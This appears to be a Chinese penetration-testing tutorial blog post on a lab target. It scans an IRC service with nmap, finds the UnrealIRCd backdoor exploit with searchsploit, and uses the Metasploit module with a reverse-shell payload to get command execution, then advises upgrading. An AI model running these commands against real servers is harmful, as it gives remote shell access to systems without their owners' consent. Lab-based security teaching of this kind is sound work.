当前位置:网站首页>6-25漏洞利用-irc后门利用
6-25漏洞利用-irc后门利用
2022-08-02 00:44:00 【山兔1】
irc介绍
IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务,IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。这个时候,就可以通过irc聊天,它的特点是速度非常之快,聊天时几乎没有延迟现象,并且只占用很小的带宽资源,使得速度更快。所有用户可以在一个被称为"Channel"(频道)的地方就某一话题进行交谈或密谈。每个IRC的使用者都有一个Nickname(昵称),用来区分不同用户。
默认情况下,irc服务器运行在6667端口。
探测目标irc
使用nmap -sV -p 6667 IP地址 探测目标irc版本信息
nmap -sV -p 6667 192.168.42.137
可以看到,很快探测出目标版本信息
msf利用irc后门
使用searchsploit查找可以利用的POC
searchsploit UnrealIRCd
可以查看到,当前软件是否存在问题,我们在这里选择Backdoor Command Execution(Metasploit),进行利用
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set payload cmd/unix/reverse
show options
set lhost 192.168.42.128
exploit
利用msf中对于irc后门连接的模块,连接shell。
可以看到,探测完成,建立了session,我们可以在这里执行任意命令
修复防御
1、升级软件版本
2、更换其他软件
边栏推荐
- ICML 2022 || 局部增强图神经网络GNN,在 GCN 和 GAT基础上 平均提高了 3.4% 和 1.6%
- 创新项目实战之智能跟随机器人原理与代码实现
- C语言实现扫雷游戏
- C language character and string function summary (2)
- Oracle data to mysql FlinkSQL CDC to achieve synchronization
- ERROR 1045 (28000) Access denied for user ‘root‘@‘localhost‘解决方法
- tf.keras.callbacks.EarlyStopping()
- 27英寸横置大屏+实体按键,全新探险者才是安全而合理的做法!
- 渗透测试与攻防对抗——渗透测试基础
- 外包干了三年,废了...
猜你喜欢
Kubernetes — Flannel
Go 1.18 的那些事——工作区、模糊测试、泛型
go mode tidy出现报错go warning “all“ matched no packages
Reflex WMS中阶系列6:对一个装货重复run pick会有什么后果?
flowable工作流所有业务概念
go笔记——map
flv.js解析与使用
Don't concatenate strings with jOOQ
Realize deletion - a specified letter in a string, such as: the string "abcd", delete the "a" letter in it, the remaining "bcd", you can also pass multiple characters to be deleted, and pass "ab" can
H5页面调用微信授权获取code
随机推荐
Kubernetes — 网络流量模型
go笔记之——goroutine
Use flex-wrap to wrap lines in flex layout
Kubernetes — 核心资源对象 — Controller
Debian侵犯Rust商标,妥协改名还是会得到豁免?
flex布局中使用flex-wrap实现换行
Why is on-chain governance so important, and how will Polkadot Gov 2.0 lead the development of on-chain governance?
Don't concatenate strings with jOOQ
PowerBI商学院佐罗BI真经连续剧
信息化和数字化的本质区别是什么?
Flex layout in detail
What is Low-Code?What scenarios is low code suitable for?
期货开户手续费加一分是主流
傅立叶变换相关公式
ES6对箭头函数的理解
tf.keras.callbacks.EarlyStopping()
21.数据增强
MLX90640 红外热成像仪测温传感器模块开发笔记(十) 成果展示-红眼睛相机
设备树学习
dayjs时间处理库的基本使用